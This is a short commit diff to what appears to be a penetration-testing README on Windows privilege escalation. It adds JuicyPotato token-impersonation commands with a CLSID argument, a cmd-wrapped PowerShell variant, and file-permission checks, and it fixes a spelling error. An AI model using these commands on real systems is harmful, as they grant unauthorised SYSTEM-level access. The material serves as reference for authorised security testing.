Update README.md
This commit is contained in:
@@ -1029,11 +1029,15 @@ net user {USERNAME}
|
||||
# Check UAC level
|
||||
whoami /groups
|
||||
|
||||
# Check Privledges for Impersonation
|
||||
# Check Privileges for Impersonation
|
||||
whoami /priv
|
||||
JuicyPotato.exe -t * -p {run.exe} -l 8003
|
||||
JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID}
|
||||
|
||||
# Check File Permissions
|
||||
Get-ACL {FILE or DIR} | fl
|
||||
icacls {FILE}
|
||||
|
||||
# Powershell
|
||||
cmd /c "JuicyPotato.exe -t * -p run.exe -l 8003 -c {CLSID}"
|
||||
|
||||
|
||||
Reference in New Issue
Block a user